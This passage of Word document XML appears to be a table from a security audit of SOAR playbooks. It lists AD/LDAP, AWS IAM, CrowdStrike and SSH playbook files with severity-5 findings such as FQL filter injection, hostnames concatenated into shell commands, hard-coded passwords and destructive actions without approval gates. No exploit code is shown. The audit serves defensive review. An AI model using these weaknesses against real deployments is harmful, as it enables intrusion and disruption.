            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Auto disable, logoff, shutdown and hash-block driven by reputation verdict, no prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/AD_LDAP_Account_Locking.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/AWS_IAM_Account_Unlocking.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Same hard-coded password in the playbook definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/AWS_IAM_Account_Unlocking.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded cloud console password applied to every re-enabled user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Device_Attribute_Lookup.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL filter injection via the device selector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Endpoint_Analysis.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01,PB1-15,PB1-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL injection into RTR sessions; super-linear regex on endpoint output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Executable_Denylisting.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01,PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Global prevent indicator uploaded for any hash, no gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_File_Collection.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01,PB1-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL injection plus raw path to RTR get</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_File_Eviction.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01,PB1-02,PB1-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL injection plus raw path as RTR rm argument, no gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_File_Restore.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01,PB1-02,PB1-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL injection; RTR put of every artifact file name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Get_Device_Info.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL filter injection via the device selector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Network_Restore.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL injection drives un-quarantine of arbitrary hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Process_Termination.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01,PB1-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL injection plus raw PID to RTR kill, no gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/block_indicators.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Blocks attacker-chosen indicator on firewall, EDR and DNS with no approval gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/internal_host_ssh_investigate.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-influenced hostname concatenated into a shell command run on the endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/internal_host_ssh_log4j_investigate.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hostname concatenated into an SSH-dispatched shell command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/internal_host_ssh_log4j_respond.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
